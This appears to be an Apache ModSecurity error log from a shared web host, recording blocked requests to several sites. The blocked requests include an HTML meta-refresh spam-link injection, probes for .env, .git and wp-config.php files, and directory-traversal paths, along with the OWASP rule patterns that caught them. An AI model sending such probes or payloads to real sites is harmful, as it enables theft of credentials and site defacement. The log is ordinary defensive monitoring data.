[Tue May 12 06:13:46.348059 2026] [security2:error] [pid 1842385:tid 1842412] [client 27.78.84.116:55491] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo-hs7kySIUZ3ORnI0CwAAARU"]
[Tue May 12 06:13:46.348175 2026] [security2:error] [pid 1842385:tid 1842412] [client 27.78.84.116:55491] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo-hs7kySIUZ3ORnI0CwAAARU"]
[Tue May 12 06:13:46.348349 2026] [security2:error] [pid 1842385:tid 1842412] [client 27.78.84.116:55491] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo-hs7kySIUZ3ORnI0CwAAARU"]
[Tue May 12 06:13:46.348763 2026] [security2:error] [pid 1842385:tid 1842412] [client 27.78.84.116:55491] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo-hs7kySIUZ3ORnI0CwAAARU"]
[Tue May 12 06:13:46.349023 2026] [security2:error] [pid 1842385:tid 1842412] [client 27.78.84.116:55491] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo-hs7kySIUZ3ORnI0CwAAARU"]
[Tue May 12 06:13:46.360074 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKo-dr1yOh9TvizezistgAAAE4"]
[Tue May 12 06:13:46.415869 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/admin/.env"] [unique_id "agKo-tr1yOh9TvizezisuAAAAE4"]
[Tue May 12 06:13:46.416035 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/admin/.env"] [unique_id "agKo-tr1yOh9TvizezisuAAAAE4"]
[Tue May 12 06:13:46.958522 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKo-tr1yOh9TvizezisuAAAAE4"]
[Tue May 12 06:13:46.998296 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.git/config"] [unique_id "agKo-tr1yOh9TvizezisugAAAE4"]
[Tue May 12 06:13:46.998507 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.git/config"] [unique_id "agKo-tr1yOh9TvizezisugAAAE4"]
[Tue May 12 06:13:47.544537 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKo-tr1yOh9TvizezisugAAAE4"]
[Tue May 12 06:13:47.584378 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php"] [unique_id "agKo-9r1yOh9TvizezisvAAAAE4"]
[Tue May 12 06:13:47.584595 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php"] [unique_id "agKo-9r1yOh9TvizezisvAAAAE4"]
[Tue May 12 06:13:48.152262 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKo-9r1yOh9TvizezisvAAAAE4"]
[Tue May 12 06:13:51.752852 2026] [security2:error] [pid 1820198:tid 1820205] [client 27.78.84.116:55950] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo_81tk6y7yBJLpJpD9wAAAIU"]
[Tue May 12 06:13:51.753284 2026] [security2:error] [pid 1820198:tid 1820205] [client 27.78.84.116:55950] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh con..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo_81tk6y7yBJLpJpD9wAAAIU"]
[Tue May 12 06:13:51.753454 2026] [security2:error] [pid 1820198:tid 1820205] [client 27.78.84.116:55950] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo_81tk6y7yBJLpJpD9wAAAIU"]
[Tue May 12 06:13:51.753566 2026] [security2:error] [pid 1820198:tid 1820205] [client 27.78.84.116:55950] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo_81tk6y7yBJLpJpD9wAAAIU"]
[Tue May 12 06:13:51.753738 2026] [security2:error] [pid 1820198:tid 1820205] [client 27.78.84.116:55950] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo_81tk6y7yBJLpJpD9wAAAIU"]
[Tue May 12 06:13:51.754166 2026] [security2:error] [pid 1820198:tid 1820205] [client 27.78.84.116:55950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo_81tk6y7yBJLpJpD9wAAAIU"]
[Tue May 12 06:13:51.754478 2026] [security2:error] [pid 1820198:tid 1820205] [client 27.78.84.116:55950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo_81tk6y7yBJLpJpD9wAAAIU"]
[Tue May 12 06:14:37.343804 2026] [security2:error] [pid 1825179:tid 1825216] [client 43.164.196.47:56854] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.naturedetres.fr"] [uri "/"] [unique_id "agKpLdr1yOh9Tvizezis5wAAAFI"]
[Tue May 12 06:14:53.365114 2026] [:error] [pid 1808852:tid 1808868] [client 114.119.146.171:31915] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:14:53.844842 2026] [security2:error] [pid 1825287:tid 1825313] [client 170.106.65.93:54234] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agKpPQgpmE1yW0glLdg7qgAAAMg"]
[Tue May 12 06:14:55.420364 2026] [ssl:error] [pid 1825179:tid 1825205] (EAI 2)Name or service not known: [client 54.162.104.89:47942] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 06:14:55.420402 2026] [ssl:error] [pid 1825179:tid 1825205] AH01941: stapling_renew_response: responder error
[Tue May 12 06:16:00.465815 2026] [proxy_http:error] [pid 1825179:tid 1825198] (20014)Internal error (specific information not available): [client 45.148.10.166:35618] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.465841 2026] [proxy:error] [pid 1825179:tid 1825198] [client 45.148.10.166:35618] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.git/logs/HEAD
[Tue May 12 06:16:00.466453 2026] [proxy_http:error] [pid 1844863:tid 1844888] (20014)Internal error (specific information not available): [client 45.148.10.166:35610] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.466477 2026] [proxy:error] [pid 1844863:tid 1844888] [client 45.148.10.166:35610] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/actuator/env
[Tue May 12 06:16:00.477363 2026] [proxy_http:error] [pid 1825287:tid 1825321] (20014)Internal error (specific information not available): [client 45.148.10.166:35524] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.477389 2026] [proxy:error] [pid 1825287:tid 1825321] [client 45.148.10.166:35524] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/
[Tue May 12 06:16:00.485720 2026] [proxy_http:error] [pid 1808852:tid 1808856] (20014)Internal error (specific information not available): [client 45.148.10.166:35554] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.485751 2026] [proxy:error] [pid 1808852:tid 1808856] [client 45.148.10.166:35554] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.git/refs/heads/master
[Tue May 12 06:16:00.485769 2026] [proxy_http:error] [pid 1825287:tid 1825321] (20014)Internal error (specific information not available): [client 45.148.10.166:35524] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.485790 2026] [proxy:error] [pid 1825287:tid 1825321] [client 45.148.10.166:35524] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/502.shtml
[Tue May 12 06:16:00.510187 2026] [proxy_http:error] [pid 1825287:tid 1825321] (20014)Internal error (specific information not available): [client 45.148.10.166:35524] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.513588 2026] [proxy_http:error] [pid 1820198:tid 1820217] (20014)Internal error (specific information not available): [client 45.148.10.166:35544] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.513614 2026] [proxy:error] [pid 1820198:tid 1820217] [client 45.148.10.166:35544] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.git/HEAD
[Tue May 12 06:16:00.514304 2026] [proxy_http:error] [pid 1842385:tid 1842415] (20014)Internal error (specific information not available): [client 45.148.10.166:35600] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.519997 2026] [proxy_http:error] [pid 1825287:tid 1825323] (20014)Internal error (specific information not available): [client 45.148.10.166:35620] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.520220 2026] [core:error] [pid 1844863:tid 1844880] [client 45.148.10.166:35560] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 06:16:00.528650 2026] [proxy_http:error] [pid 1844863:tid 1844880] (20014)Internal error (specific information not available): [client 45.148.10.166:35560] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.538618 2026] [core:error] [pid 1825179:tid 1825201] [client 45.148.10.166:35506] AH10244: invalid URI path (/../.env)
[Tue May 12 06:16:00.547080 2026] [proxy_http:error] [pid 1808852:tid 1808864] (20014)Internal error (specific information not available): [client 45.148.10.166:35472] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.558438 2026] [proxy_http:error] [pid 1820198:tid 1820220] (20014)Internal error (specific information not available): [client 45.148.10.166:35594] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.564195 2026] [core:error] [pid 1825287:tid 1825329] [client 45.148.10.166:35578] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 06:16:00.571968 2026] [core:error] [pid 1842385:tid 1842412] [client 45.148.10.166:35482] AH10244: invalid URI path (/static../../../.env)
[Tue May 12 06:16:00.572139 2026] [proxy_http:error] [pid 1820198:tid 1820202] (20014)Internal error (specific information not available): [client 45.148.10.166:35576] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.576627 2026] [proxy_http:error] [pid 1825179:tid 1825197] (20014)Internal error (specific information not available): [client 45.148.10.166:35532] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.613082 2026] [proxy_http:error] [pid 1844863:tid 1844879] (20014)Internal error (specific information not available): [client 45.148.10.166:35644] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.613108 2026] [proxy:error] [pid 1844863:tid 1844879] [client 45.148.10.166:35644] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/storage/.env
[Tue May 12 06:16:00.616900 2026] [proxy_http:error] [pid 1820198:tid 1820217] (20014)Internal error (specific information not available): [client 45.148.10.166:35544] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.618334 2026] [proxy_http:error] [pid 1825287:tid 1825327] (20014)Internal error (specific information not available): [client 45.148.10.166:35630] AH01102: error reading status line from remote server 127.0.0.1:2082
